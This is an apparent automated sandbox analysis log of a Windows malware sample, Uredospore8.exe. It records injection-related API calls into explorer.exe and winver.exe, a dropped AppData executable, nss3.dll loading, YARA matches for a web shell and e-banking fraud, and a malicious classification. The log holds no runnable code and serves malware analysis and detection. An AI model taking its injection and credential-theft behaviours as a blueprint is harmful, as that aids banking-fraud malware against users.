    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: Process Memory Space: winver.exe PID: 616, type: MEMORYSTR

    E-Banking Fraud

    barindex
    Source: Yara matchFile source: Process Memory Space: winver.exe PID: 616, type: MEMORYSTR
    Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10DJump to dropped file

    System Summary

    barindex
    Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_00700655 NtWriteVirtualMemory,0_2_00700655
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_007005BC ReadProcessMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,0_2_007005BC
    Source: C:\Windows\explorer.exeCode function: 4_2_00F822BA NtQueryDirectoryFile,4_2_00F822BA
    Source: C:\Windows\explorer.exeCode function: 4_2_00F8221B NtEnumerateValueKey,4_2_00F8221B
    Source: C:\Windows\explorer.exeCode function: 4_2_00F81F2B NtCreateUserProcess,4_2_00F81F2B
    Source: C:\Windows\System32\sihost.exeCode function: 5_2_00D0221B NtEnumerateValueKey,5_2_00D0221B
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 19_2_001C16C0 NtResumeThread,19_2_001C16C0
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 19_2_001C15E4 NtCreateUserProcess,19_2_001C15E4
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 19_2_02250655 NtWriteVirtualMemory,19_2_02250655
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 19_2_022505BC ReadProcessMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,19_2_022505BC
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_001C16C0 NtResumeThread,30_2_001C16C0
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_001C15E4 NtCreateUserProcess,30_2_001C15E4
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_02141636 NtCreateProcessEx,30_2_02141636
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_02141677 NtCreateThread,30_2_02141677
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_021420BC NtEnumerateValueKey,30_2_021420BC
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_021416C0 NtResumeThread,30_2_021416C0
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_0214212E NtQueryDirectoryFile,30_2_0214212E
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_021415E4 NtCreateUserProcess,30_2_021415E4
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_02150655 NtWriteVirtualMemory,30_2_02150655
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_021505BC ReadProcessMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,30_2_021505BC
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_004012000_2_00401200
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_004030C10_2_004030C1
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_004030CD0_2_004030CD
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 0_2_004039A50_2_004039A5
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_006D00052_2_006D0005
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_006D0EEA2_2_006D0EEA
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_006D188F2_2_006D188F
    Source: C:\Windows\SysWOW64\winver.exeCode function: 3_2_00D40EC63_2_00D40EC6
    Source: C:\Windows\SysWOW64\winver.exeCode function: 3_2_00D4186B3_2_00D4186B
    Source: C:\Windows\explorer.exeCode function: 4_2_00F80EC64_2_00F80EC6
    Source: C:\Windows\explorer.exeCode function: 4_2_00F8186B4_2_00F8186B
    Source: C:\Windows\explorer.exeCode function: 4_2_02DF0EC64_2_02DF0EC6
    Source: C:\Windows\explorer.exeCode function: 4_2_02DF186B4_2_02DF186B
    Source: C:\Windows\System32\sihost.exeCode function: 5_2_00D00EC65_2_00D00EC6
    Source: C:\Windows\System32\sihost.exeCode function: 5_2_00D0186B5_2_00D0186B
    Source: C:\Windows\System32\svchost.exeCode function: 6_2_00F00EC66_2_00F00EC6
    Source: C:\Windows\System32\svchost.exeCode function: 6_2_00F0186B6_2_00F0186B
    Source: C:\Windows\System32\svchost.exeCode function: 7_2_0019186B7_2_0019186B
    Source: C:\Windows\System32\svchost.exeCode function: 7_2_00190EC67_2_00190EC6
    Source: C:\Windows\System32\ctfmon.exeCode function: 8_2_009E0EC68_2_009E0EC6
    Source: C:\Windows\System32\ctfmon.exeCode function: 8_2_009E186B8_2_009E186B
    Source: C:\Windows\System32\svchost.exeCode function: 9_2_00840EC69_2_00840EC6
    Source: C:\Windows\System32\svchost.exeCode function: 9_2_0084186B9_2_0084186B
    Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 10_2_00EE0EC610_2_00EE0EC6
    Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 10_2_00EE186B10_2_00EE186B
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 11_2_00A40EC611_2_00A40EC6
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 11_2_00A4186B11_2_00A4186B
    Source: C:\Windows\System32\dllhost.exeCode function: 15_2_005F186B15_2_005F186B
    Source: C:\Windows\System32\dllhost.exeCode function: 15_2_005F0EC615_2_005F0EC6
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 16_2_0053186B16_2_0053186B
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 16_2_00530EC616_2_00530EC6
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_00820EC617_2_00820EC6
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0082186B17_2_0082186B
    Source: C:\Windows\System32\smartscreen.exeCode function: 18_2_0025186B18_2_0025186B
    Source: C:\Windows\System32\smartscreen.exeCode function: 18_2_00250EC618_2_00250EC6
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 19_2_001C186B19_2_001C186B
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 19_2_001C0EC619_2_001C0EC6
    Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 20_2_00930EC620_2_00930EC6
    Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 20_2_0093186B20_2_0093186B
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_0018186B22_2_0018186B
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_00180EC622_2_00180EC6
    Source: C:\Windows\System32\svchost.exeCode function: 23_2_0067186B23_2_0067186B
    Source: C:\Windows\System32\svchost.exeCode function: 23_2_00670EC623_2_00670EC6
    Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 24_2_009C0EC624_2_009C0EC6
    Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: 24_2_009C186B24_2_009C186B
    Source: C:\Windows\System32\conhost.exeCode function: 25_2_00F70EC625_2_00F70EC6
    Source: C:\Windows\System32\conhost.exeCode function: 25_2_00F7186B25_2_00F7186B
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 27_2_00D50EC627_2_00D50EC6
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: 27_2_00D5186B27_2_00D5186B
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 29_2_011A186B29_2_011A186B
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 29_2_011A0EC629_2_011A0EC6
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_001C186B30_2_001C186B
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_001C0EC630_2_001C0EC6
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_0214186B30_2_0214186B
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 30_2_02140EC630_2_02140EC6
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 31_2_0234186B31_2_0234186B
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 31_2_02340EC631_2_02340EC6
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 32_2_00D60EC632_2_00D60EC6
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 32_2_00D6186B32_2_00D6186B
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 33_2_00E10EC633_2_00E10EC6
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 33_2_00E1186B33_2_00E1186B
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 34_2_001D186B34_2_001D186B
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 34_2_001D0EC634_2_001D0EC6
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 34_2_008B000534_2_008B0005
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: 34_2_008B0EEA34_2_008B0EEA
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 35_2_0214186B35_2_0214186B
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 35_2_02140EC635_2_02140EC6
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 36_2_0073186B36_2_0073186B
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 36_2_00730EC636_2_00730EC6
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 37_2_00B10EC637_2_00B10EC6
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 37_2_00B1186B37_2_00B1186B
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 38_2_0268186B38_2_0268186B
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 38_2_02680EC638_2_02680EC6
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 39_2_0255186B39_2_0255186B
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 39_2_02550EC639_2_02550EC6
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 40_2_0213186B40_2_0213186B
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: 40_2_02130EC640_2_02130EC6
    Source: C:\Windows\System32\conhost.exeCode function: String function: 00F7375B appears 34 times
    Source: C:\Windows\SysWOW64\winver.exeCode function: String function: 00D4375B appears 34 times
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: String function: 001C375B appears 68 times
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: String function: 001D375B appears 34 times
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: String function: 001C38A7 appears 40 times
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: String function: 008B377F appears 34 times
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeCode function: String function: 0214375B appears 34 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 0019375B appears 34 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 00F0375B appears 34 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 0084375B appears 34 times
    Source: C:\Windows\System32\svchost.exeCode function: String function: 0067375B appears 34 times
    Source: C:\Windows\System32\ctfmon.exeCode function: String function: 009E375B appears 34 times
    Source: C:\Windows\explorer.exeCode function: String function: 00F8375B appears 34 times
    Source: C:\Windows\explorer.exeCode function: String function: 02DF375B appears 34 times
    Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: String function: 0093375B appears 34 times
    Source: C:\Windows\System32\smartscreen.exeCode function: String function: 0025375B appears 34 times
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: String function: 0213375B appears 34 times
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: String function: 00B1375B appears 34 times
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: String function: 011A375B appears 34 times
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: String function: 0073375B appears 34 times
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: String function: 0268375B appears 34 times
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: String function: 0214375B appears 34 times
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: String function: 0234375B appears 34 times
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: String function: 00E1375B appears 34 times
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: String function: 0255375B appears 34 times
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeCode function: String function: 00D6375B appears 34 times
    Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: String function: 00EE375B appears 34 times
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: String function: 006D377F appears 34 times
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 0053375B appears 34 times
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00D5375B appears 34 times
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 0018375B appears 34 times
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 0082375B appears 34 times
    Source: C:\Windows\System32\RuntimeBroker.exeCode function: String function: 00A4375B appears 34 times
    Source: C:\Windows\System32\sihost.exeCode function: String function: 00D0375B appears 34 times
    Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeCode function: String function: 009C375B appears 34 times
    Source: C:\Windows\System32\dllhost.exeCode function: String function: 005F375B appears 34 times
    Source: Uredospore8.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
    Source: classification engineClassification label: mal100.bank.evad.winEXE@13/15@2/2
    Source: C:\Users\user\Desktop\Uredospore8.exeCode function: 2_2_006D0005 ExitProcess,GetProcAddress,GetModuleHandleW,ReadFile,WriteFile,SetFilePointer,CloseHandle,CreateToolhelp32Snapshot,Process32Next,OpenProcess,VirtualFree,VirtualAllocEx,CreateMutexA,CreateMutexA,lstrcat,lstrcmpiA,Sleep,CreateDirectoryA,SetFileAttributesA,CreateDirectoryA,SetFileAttributesA,CreateDirectoryA,SetFileAttributesA,VirtualAlloc,VirtualFree,Sleep,2_2_006D0005
    Source: C:\Windows\SysWOW64\winver.exeFile created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\E6B93DA9Jump to behavior
    Source: C:\Windows\SysWOW64\winver.exeMutant created: \Sessions\1\BaseNamedObjects\E6B93DA9
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeMutant created: NULL
    Source: Uredospore8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Uredospore8.exeReversingLabs: Detection: 86%
    Source: unknownProcess created: C:\Users\user\Desktop\Uredospore8.exe "C:\Users\user\Desktop\Uredospore8.exe"
    Source: C:\Users\user\Desktop\Uredospore8.exeProcess created: C:\Users\user\Desktop\Uredospore8.exe "C:\Users\user\Desktop\Uredospore8.exe"
    Source: C:\Users\user\Desktop\Uredospore8.exeProcess created: C:\Windows\SysWOW64\winver.exe winver
    Source: C:\Windows\SysWOW64\winver.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe"
    Source: C:\Users\user\Desktop\Uredospore8.exeProcess created: C:\Users\user\Desktop\Uredospore8.exe "C:\Users\user\Desktop\Uredospore8.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeProcess created: C:\Windows\SysWOW64\winver.exe winverJump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe" Jump to behavior
    Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe" Jump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe "C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe" Jump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeSection loaded: msvbvm60.dllJump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeSection loaded: vb6zz.dllJump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Uredospore8.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\winver.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
    Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: dxcore.dllJump to behavior
    Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\dllhost.exeSection loaded: esent.dllJump to behavior
    Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\dllhost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\dllhost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: msvbvm60.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: vb6zz.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: msvbvm60.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: vb6zz.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exeSection loaded: nss3.dllJump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
